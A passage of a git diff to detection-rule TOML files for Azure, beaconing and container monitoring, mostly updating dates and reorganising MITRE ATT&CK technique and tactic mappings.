"2025/04/30" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,25 +81,26 @@ sequence with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.005" -name = "Device Registration" -reference = "https://attack.mitre.org/techniques/T1098/005/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.005" +name = "Device Registration" +reference = "https://attack.mitre.org/techniques/T1098/005/" [rule.threat.tactic] id = "TA0003" diff --git a/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml b/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml index de9b0f23509..658060292b8 100644 --- a/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml +++ b/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/15" integration = ["azure"] maturity = "production" -updated_date = "2025/09/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -93,18 +93,36 @@ event.dataset: azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml b/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml index 0f07d5c9080..fa9e622f40b 100644 --- a/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml +++ b/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/22" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -90,22 +90,39 @@ event.dataset: azure.auditlogs [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["azure.auditlogs.properties.initiated_by.user.userPrincipalName"] diff --git a/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml b/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml index eae2f416a42..b400b2509d4 100644 --- a/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml +++ b/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Austin Songer"] @@ -82,30 +82,46 @@ event.outcome:(Success or success) [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/beaconing/command_and_control_beaconing.toml b/rules/integrations/beaconing/command_and_control_beaconing.toml index f89fe47c8c3..5b75f76288e 100644 --- a/rules/integrations/beaconing/command_and_control_beaconing.toml +++ b/rules/integrations/beaconing/command_and_control_beaconing.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["beaconing", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,19 +95,23 @@ Statistical models analyze network traffic patterns to identify anomalies indica [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" + [[rule.threat.technique.subtechnique]] id = "T1102.002" name = "Bidirectional Communication" reference = "https://attack.mitre.org/techniques/T1102/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml b/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml index 0fe0d4d7320..26026a63b9d 100644 --- a/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml +++ b/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["beaconing", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,19 +90,23 @@ Statistical models analyze network traffic patterns to identify anomalies indica [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" + [[rule.threat.technique.subtechnique]] id = "T1102.002" name = "Bidirectional Communication" reference = "https://attack.mitre.org/techniques/T1102/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml b/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml index 98c2b0a4e53..a49b73ed4f7 100644 --- a/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml +++ b/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -71,6 +71,11 @@ process.interactive == true and container.id like "?*" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml b/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml index 5d448150ea9..eb6374efd8e 100644 --- a/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml +++ b/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,35 +95,40 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml b/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml index 0e1b024eb19..5a9bac0b72e 100644 --- a/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml +++ b/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -96,6 +96,11 @@ process where event.type == "start" and event.action == "exec" and ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/integrations/cloud_defend/credential_access_cloud_creds_search_inside_a_container.toml b/rules/integrations/cloud_defend/credential_access_cloud_creds_search_inside_a_container.toml index 66fa6456e01..aeef03f2cd3 100644 --- a/rules/integrations/cloud_defend/credential_access_cloud_creds_search_inside_a_container.toml +++ b/rules/integrations/cloud_defend/credential_access_cloud_creds_search_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,3 +94,16 @@ reference = "https://attack.mitre.org/techniques/T1552/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml b/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml index 67fbebdda38..6bb349847f8 100644 --- a/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml +++ b/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,6 +125,11 @@ reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" diff --git a/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml b/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml index 6466f00e4a8..e7d2d276fcd 100644 --- a/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml +++ b/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -115,7 +115,38 @@ id = "T1552.001" name = "Credentials In Files" reference = "https://attack.mitre.org/techniques/T1552/001/" +[[rule.threat.technique.subtechnique]] +id = "T1552.004" +name = "Private Keys" +reference = "https://attack.mitre.org/techniques/T1552/004/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml b/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml index 1dc98471512..52c57446c7d 100644 --- a/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml +++ b/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/06" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -115,3 +115,16 @@ reference = "https://attack.mitre.org/techniques/T1552/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml b/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml index a3e3f977696..e44e8569760 100644 --- a/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml +++ b/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -130,45 +130,60 @@ sequence by process.parent.entity_id, container.id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique]] - name = "Obfuscated Files or Information" - id = "T1027" - reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" - [[rule.threat.technique]] - name = "Deobfuscate/Decode Files or Information" - id = "T1140" - reference = "https://attack.mitre.org/techniques/T1140/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" - - [[rule.threat.technique]] - name = "User Execution" - id = "T1204" - reference = "https://attack.mitre.org/techniques/T1204/" - - [[rule.threat.technique.subtechnique]] - name = "Malicious File" - id = "T1204.002" - reference = "https://attack.mitre.org/techniques/T1204/002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml b/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml index 5da9a158df8..fec72adfd73 100644 --- a/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml +++ b/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -150,3 +150,16 @@ reference = "https://attack.mitre.org/techniques/T1204/002/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml b/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml index 0538c4cd9c4..e03bdc70ab2 100644 --- a/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml +++ b/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -75,24 +75,29 @@ process where event.type == "start" and event.action == "exec" and process.inter [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" [[rule.threat.technique]] -name = "Reflective Code Loading" id = "T1620" +name = "Reflective Code Loading" reference = "https://attack.mitre.org/techniques/T1620/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -103,15 +108,20 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Command and Control" -id = "TA0011" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] -name = "Application Layer Protocol" id = "T1071" +name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml b/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml index f84f1a58ad4..ad67670330b 100644 --- a/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml +++ b/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,3 +99,39 @@ reference = "https://attack.mitre.org/techniques/T1574/006/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml b/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml index 4168f4a7137..d739ee6e277 100644 --- a/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml +++ b/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,6 +110,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + [[rule.threat.technique]] id = "T1204" name = "User Execution" diff --git a/rules/integrations/cloud_defend/discovery_dns_enumeration.toml b/rules/integrations/cloud_defend/discovery_dns_enumeration.toml index f09bad36a77..a240e78a308 100644 --- a/rules/integrations/cloud_defend/discovery_dns_enumeration.toml +++ b/rules/integrations/cloud_defend/discovery_dns_enumeration.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -109,26 +109,31 @@ process.interactive == true and container.id like "*" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" reference = "https://attack.mitre.org/techniques/T1049/" +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/integrations/cloud_defend/discovery_environment_enumeration.toml b/rules/integrations/cloud_defend/discovery_environment_enumeration.toml index f5cef44a7f2..05fdcbcc1be 100644 --- a/rules/integrations/cloud_defend/discovery_environment_enumeration.toml +++ b/rules/integrations/cloud_defend/discovery_environment_enumeration.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -96,16 +96,16 @@ process.interactive == true and container.id like "*" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml b/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml index 9a67f6171d9..91e58c85891 100644 --- a/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml +++ b/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,3 +101,21 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.004" +name = "Private Keys" +reference = "https://attack.mitre.org/techniques/T1552/004/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git 